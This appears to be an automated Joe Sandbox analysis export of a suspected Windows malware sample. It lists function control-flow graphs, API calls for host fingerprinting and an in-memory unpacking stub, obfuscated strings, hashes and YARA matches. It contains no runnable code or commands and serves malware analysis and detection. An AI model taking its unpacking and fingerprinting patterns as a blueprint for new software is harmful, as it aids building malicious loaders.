                                                                                                    control_flow_graph 0 43d0d0-43d112 1 43d120-43d18e 0->1 1->1 2 43d190-43d1b6 1->2 3 43d1c0-43d1f8 2->3 3->3 4 43d1fa-43d25f 3->4 5 43d260-43d289 4->5 5->5 6 43d28b-43d2a8 5->6 8 43d2ae-43d2b8 6->8 9 43d3bd-43d3d5 6->9 10 43d2c0-43d31d 8->10 11 43d3e0-43d3ff 9->11 10->10 12 43d31f-43d349 10->12 11->11 13 43d401-43d47b 11->13 14 43d350-43d3af 12->14 15 43d480-43d4c0 13->15 14->14 16 43d3b1-43d3b5 14->16 15->15 17 43d4c2-43d51f 15->17 16->9 18 43d520-43d527 17->18 18->18 19 43d529-43d57f CoCreateInstance 18->19 20 43d585-43d5d5 19->20 21 43db6d-43db99 call 443b60 GetVolumeInformationW 19->21 22 43d5e0-43d605 20->22 26 43dba2-43dba4 21->26 27 43db9b-43db9e 21->27 22->22 24 43d607-43d62e SysAllocString 22->24 32 43d634-43d64e CoSetProxyBlanket 24->32 33 43db5c-43db69 SysFreeString 24->33 28 43dbc7-43dbd2 26->28 27->26 30 43dbd4-43dbdb 28->30 31 43dbde-43dc0b 28->31 30->31 34 43dc10-43dc6a 31->34 35 43db52-43db58 32->35 36 43d654-43d67f 32->36 33->21 34->34 37 43dc6c-43dc97 34->37 35->33 38 43d680-43d6a5 36->38 39 43dca0-43dcdc 37->39 38->38 40 43d6a7-43d732 SysAllocString 38->40 39->39 41 43dcde-43dd02 call 41dce0 39->41 42 43d740-43d762 40->42 46 43dd10-43dd17 41->46 42->42 44 43d764-43d78c SysAllocString 42->44 49 43d792-43d7b4 44->49 50 43db39-43db4e SysFreeString * 2 44->50 46->46 48 43dd19-43dd2c 46->48 51 43dd32-43dd45 call 408430 48->51 52 43dbb0-43dbc1 48->52 56 43d7ba-43d7bd 49->56 57 43db2f-43db35 49->57 50->35 51->52 52->28 54 43dd4a-43dd51 52->54 56->57 59 43d7c3-43d7c8 56->59 57->50 59->57 60 43d7ce-43d843 VariantInit 59->60 61 43d850-43d8d3 60->61 61->61 62 43d8d9-43d8f2 61->62 63 43d8f6-43d8fb 62->63 64 43d901-43d90a 63->64 65 43db1e-43db2b VariantClear 63->65 64->65 66 43d910-43d91f 64->66 65->57 67 43d921-43d926 66->67 68 43d95d 66->68 70 43d93c-43d940 67->70 69 43d95f-43d97d call 408270 68->69 79 43d983-43d997 69->79 80 43dac9-43dada 69->80 72 43d942-43d94b 70->72 73 43d930 70->73 76 43d952-43d956 72->76 77 43d94d-43d950 72->77 75 43d931-43d93a 73->75 75->69 75->70 76->75 78 43d958-43d95b 76->78 77->75 78->75 79->80 81 43d99d-43d9a3 79->81 82 43dae1-43daf2 80->82 83 43dadc 80->83 84 43d9b0-43d9ba 81->84 85 43daf4 82->85 86 43daf9-43db1b call 4082a0 call 408280 82->86 83->82 87 43d9d0-43d9d6 84->87 88 43d9bc-43d9c1 84->88 85->86 86->65 91 43d9f5-43da07 87->91 92 43d9d8-43d9db 87->92 90 43da60-43da76 88->90 95 43da79-43da7f 90->95 97 43da8b-43da94 91->97 98 43da0d-43da10 91->98 92->91 96 43d9dd-43d9f3 92->96 95->80 100 43da81-43da83 95->100 96->90 101 43da96-43da98 97->101 102 43da9a-43da9d 97->102 98->97 103 43da12-43da5f 98->103 100->84 104 43da89 100->104 101->95 105 43dac5-43dac7 102->105 106 43da9f-43dac3 102->106 103->90 104->80 105->90 106->90
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
                                                                                                    • SysAllocString.OLEAUT32 ref: 0043D608
                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
                                                                                                    • SysAllocString.OLEAUT32 ref: 0043D6A8
                                                                                                    • SysAllocString.OLEAUT32 ref: 0043D765
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0043D7D6
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                                    • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                                                    • API String ID: 505850577-1972840126
                                                                                                    • Opcode ID: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                                                    • Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
                                                                                                    • Opcode Fuzzy Hash: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
                                                                                                    • Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 317 408a60-408a71 call 4416b0 320 408d05-408d07 ExitProcess 317->320 321 408a77-408a7e call 43a2c0 317->321 324 408d00 call 442000 321->324 325 408a84-408abb GetCurrentProcessId GetCurrentThreadId 321->325 324->320 326 408ac3-408b93 SHGetSpecialFolderPathW GetForegroundWindow 325->326 327 408abd-408ac1 325->327 329 408b95-408bb7 326->329 330 408bdc-408bef 326->330 327->326 331 408bb9-408bbb 329->331 332 408bbd-408bda 329->332 333 408bf0-408c1c 330->333 331->332 332->330 333->333 334 408c1e-408c4a call 4404b0 333->334 337 408c50-408c8b 334->337 338 408cc4-408ce2 call 40a170 337->338 339 408c8d-408cc2 337->339 342 408ce4 call 40d400 338->342 343 408cee-408cf5 338->343 339->337 346 408ce9 call 40c050 342->346 343->324 345 408cf7-408cfd call 408280 343->345 345->324 346->343
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00408A84
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408A8E
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
                                                                                                    • GetForegroundWindow.USER32 ref: 00408B8B
                                                                                                    • ExitProcess.KERNEL32 ref: 00408D07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4063528623-0
                                                                                                    • Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                                                    • Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
                                                                                                    • Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                                                                    • Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 350 40c080-40c2df 351 40c2e0-40c315 350->351 351->351 352 40c317-40c323 351->352 353 40c326-40c343 352->353
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 50$DM_e$FwPq$Js$'!
                                                                                                    • API String ID: 0-1711485358
                                                                                                    • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
                                                                                                    • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 354 418ba2-418c02 355 418c10-418c4c 354->355 355->355 356 418c4e-418c6e call 401dd0 355->356 359 418da0-418da6 call 408280 356->359 360 419040-419049 call 401f60 356->360 361 418d83-418d9c 356->361 362 418fa3-418fb0 356->362 363 418fe6-419010 call 41bdd0 356->363 364 418da9-418dba 356->364 365 419030 356->365 366 419050-419056 call 401f60 356->366 367 418c75-418ccb 356->367 368 418dd4-418de9 call 401e00 356->368 369 418fb7-418fc5 356->369 370 419018-419021 call 408280 356->370 371 41903a 356->371 359->364 360->366 373 418dbd-418dcd call 401df0 361->373 362->359 362->360 362->363 362->364 362->365 362->366 362->369 362->370 375 41905f-4195af 362->375 363->370 364->373 365->371 366->375 380 418cd0-418cf4 367->380 394 418e50 368->394 395 418deb-418df0 368->395 376 418fe1 369->376 377 418fc7-418fcf 369->377 370->365 371->360 373->359 373->360 373->362 373->363 373->364 373->365 373->366 373->368 373->369 373->370 373->371 373->375 376->363 387 418fd0-418fdf 377->387 380->380 390 418cf6-418d79 call 41bdd0 380->390 387->376 387->387 390->361 398 418e52-418e55 394->398 397 418e09-418e0b 395->397 400 418e00 397->400 401 418e0d-418e1e 397->401 402 418e60 398->402 403 418e57-418e5c 398->403 404 418e01-418e07 400->404 401->400 405 418e20-418e38 401->405 406 418e67-418eb2 call 408270 call 40aff0 402->406 403->406 404->397 404->398 405->400 407 418e3a-418e46 405->407 413 418ec0-418ec2 406->413 414 418eb4-418eb9 406->414 407->404 409 418e48-418e4b 407->409 409->404 415 418ec9-418ee4 call 408270 413->415 414->415 418 418f01-418f2f 415->418 419 418ee6-418eeb 415->419 421 418f30-418f4a 418->421 420 418ef0-418eff 419->420 420->418 420->420 421->421 422 418f4c-418f60 421->422 423 418f81-418f8f call 445260 422->423 424 418f62-418f67 422->424 427 418f94-418f9c 423->427 425 418f70-418f7f 424->425 425->423 425->425 427->359 427->360 427->362 427->363 427->364 427->365 427->366 427->369 427->370 427->375
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PWPQ$bd\,$fnga$oQ
                                                                                                    • API String ID: 0-3706350231
                                                                                                    • Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                                                    • Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
                                                                                                    • Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                                                                    • Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 428 422370-422384 429 42238a-4223df 428->429 430 42286f-42287b 428->430 431 4223e0-422459 429->431 431->431 432 42245b-4224a3 call 441650 431->432 435 4224b0-4224c4 432->435 435->435 436 4224c6-422508 435->436 437 422510-422524 436->437 437->437 438 422526-422578 437->438 439 422580-422594 438->439 439->439 440 422596-4225d9 call 443b60 439->440 443 4225dc-4225e5 440->443 444 4225e7-4225fc 443->444 445 42264f-422651 443->445 447 422656-422658 444->447 448 4225fe-422603 444->448 445->430 450 422865-42286b 447->450 449 422610-422619 448->449 449->449 451 42261b-42262a 449->451 450->430 452 422630-422639 451->452 452->452 453 42263b-422646 452->453 454 422648-42264d 453->454 455 42265d 453->455 456 42265f-422670 call 408270 454->456 455->456 459 422672-422677 456->459 460 422691-4226a5 456->460 461 422680-42268f 459->461 462 4226b0-4226d3 460->462 461->460 461->461 462->462 463 4226d5-4226e7 462->463 464 422701-422715 463->464 465 4226e9-4226ef 463->465 468 422717-422727 464->468 469 422778-42277a 464->469 466 4226f0-4226ff 465->466 466->464 466->466 468->469 473 422729-422749 468->473 470 422852-422862 call 408280 469->470 470->450 473->469 477 42274b-42275a 473->477 478 422760-422769 477->478 478->478 479 42276b-42276f 478->479 480 422771-422776 479->480 481 42277f 479->481 482 422781-422792 call 408270 480->482 481->482 485 4227b1-4227c2 482->485 486 422794-422799 482->486 488 4227d0-4227e4 485->488 487 4227a0-4227af 486->487 487->485 487->487 488->488 489 4227e6-4227ff 488->489 490 422822-42284f call 4219a0 call 408280 489->490 491 422801-422804 489->491 490->470 492 422810-422820 491->492 492->490 492->492
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                                                    • API String ID: 0-185452761
                                                                                                    • Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                                                    • Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
                                                                                                    • Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                                                                                    • Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                                                    • Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
                                                                                                    • Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                                                                    • Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86
                                                                                                    APIs
                                                                                                    • LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                                                    • Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
                                                                                                    • Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                                                    • Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                                                    • Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
                                                                                                    • Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                                                    • Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 111 20b003c-20b0047 112 20b0049 111->112 113 20b004c-20b0263 call 20b0a3f call 20b0e0f call 20b0d90 VirtualAlloc 111->113 112->113 128 20b028b-20b0292 113->128 129 20b0265-20b0289 call 20b0a69 113->129 131 20b02a1-20b02b0 128->131 133 20b02ce-20b03c2 VirtualProtect call 20b0cce call 20b0ce7 129->133 131->133 134 20b02b2-20b02cc 131->134 140 20b03d1-20b03e0 133->140 134->131 141 20b0439-20b04b8 VirtualFree 140->141 142 20b03e2-20b0437 call 20b0ce7 140->142 144 20b04be-20b04cd 141->144 145 20b05f4-20b05fe 141->145 142->140 147 20b04d3-20b04dd 144->147 148 20b077f-20b0789 145->148 149 20b0604-20b060d 145->149 147->145 153 20b04e3-20b0505 LoadLibraryA 147->153 151 20b078b-20b07a3 148->151 152 20b07a6-20b07b0 148->152 149->148 154 20b0613-20b0637 149->154 151->152 155 20b086e-20b08be LoadLibraryA 152->155 156 20b07b6-20b07cb 152->156 157 20b0517-20b0520 153->157 158 20b0507-20b0515 153->158 159 20b063e-20b0648 154->159 163 20b08c7-20b08f9 155->163 160 20b07d2-20b07d5 156->160 161 20b0526-20b0547 157->161 158->161 159->148 162 20b064e-20b065a 159->162 164 20b07d7-20b07e0 160->164 165 20b0824-20b0833 160->165 166 20b054d-20b0550 161->166 162->148 167 20b0660-20b066a 162->167 168 20b08fb-20b0901 163->168 169 20b0902-20b091d 163->169 170 20b07e2 164->170 171 20b07e4-20b0822 164->171 175 20b0839-20b083c 165->175 172 20b05e0-20b05ef 166->172 173 20b0556-20b056b 166->173 174 20b067a-20b0689 167->174 168->169 170->165 171->160 172->147 176 20b056f-20b057a 173->176 177 20b056d 173->177 178 20b068f-20b06b2 174->178 179 20b0750-20b077a 174->179 175->155 180 20b083e-20b0847 175->180 186 20b059b-20b05bb 176->186 187 20b057c-20b0599 176->187 177->172 181 20b06ef-20b06fc 178->181 182 20b06b4-20b06ed 178->182 179->159 183 20b084b-20b086c 180->183 184 20b0849 180->184 188 20b074b 181->188 189 20b06fe-20b0748 181->189 182->181 183->175 184->155 194 20b05bd-20b05db 186->194 187->194 188->174 189->188 194->166
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020B024D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: cess$kernel32.dll
                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction ID: 14817da49ff3392f219a4229ff7d25448ff8ef163c1352c92a335c57ab03c33e
                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                    • Instruction Fuzzy Hash: B8526974A01229DFDBA5CF68C984BADBBB1BF09304F1480D9E54DAB351DB30AA85DF14

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 497 20807a6-20807bf 498 20807c1-20807c3 497->498 499 20807ca-20807d6 CreateToolhelp32Snapshot 498->499 500 20807c5 498->500 501 20807d8-20807de 499->501 502 20807e6-20807f3 Module32First 499->502 500->499 501->502 507 20807e0-20807e4 501->507 503 20807fc-2080804 502->503 504 20807f5-20807f6 call 2080465 502->504 508 20807fb 504->508 507->498 507->502 508->503
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020807CE
                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 020807EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291465028.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_2080000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3833638111-0
                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction ID: 0a101678ac717b837d0ae6530fd11349ab85ed16e94684e61c163ba6d33a6aab
                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                    • Instruction Fuzzy Hash: 38F096315017116FE7213BF5D88CB6F76E9AF49A65F100568E683910C0DB70E8495E61

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32 ref: 004423C5
                                                                                                    • GetForegroundWindow.USER32 ref: 004423E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ForegroundWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2020703349-0
                                                                                                    • Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                                                                    • Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
                                                                                                    • Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                                                                    • Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 515 20b0e0f-20b0e24 SetErrorMode * 2 516 20b0e2b-20b0e2c 515->516 517 20b0e26 515->517 517->516
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,020B0223,?,?), ref: 020B0E19
                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,020B0223,?,?), ref: 020B0E1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_20b0000_5734.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction ID: c2860f47db282722f4f6209d79134e175963663ed1f9cd71128f4e39bb3dd98e
                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction Fuzzy Hash: 53D0123514522877D7512A94DC09BCE7B5CDF05B66F008011FB0DD9080C770954046E5
                                                                                                    APIs
                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040BC80,00000000,00000000), ref: 00442052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                                                                                    • Instruction ID: ce4dc6f8cea40f70218e043c946db7baefed7d7f927e290f9bf4e18e7a102a01
                                                                                                    • Opcode Fuzzy Hash: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                                                                                    • Instruction Fuzzy Hash: 95E02B72514210ABF2101F387C05B1736749FC2715F054436F601A3111D739E811C19E
                                                                                                    APIs
                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                                                                    • Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
                                                                                                    • Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                                                                    • Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569
                                                                                                    APIs
                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2291017440.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2291017440.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_5734.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeSecurity
                                                                                                    • String ID:
                                                                                                    • API String ID: 640775948-0
